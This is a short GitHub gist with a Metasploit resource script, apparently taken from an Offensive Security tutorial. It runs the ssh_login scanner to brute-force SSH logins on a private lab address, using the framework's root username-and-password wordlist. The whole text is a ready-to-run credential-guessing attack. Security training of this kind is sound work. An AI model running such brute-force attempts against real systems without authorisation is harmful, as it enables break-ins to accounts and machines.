Skip to content

Instantly share code, notes, and snippets.

@picatz
Created December 1, 2017 19:28
Show Gist options
  • Save picatz/b3595266e1df6ed56d0647c1d8fd6b7e to your computer and use it in GitHub Desktop.
Save picatz/b3595266e1df6ed56d0647c1d8fd6b7e to your computer and use it in GitHub Desktop.
ssh_login
# https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.154
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
set VERBOSE false
run
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment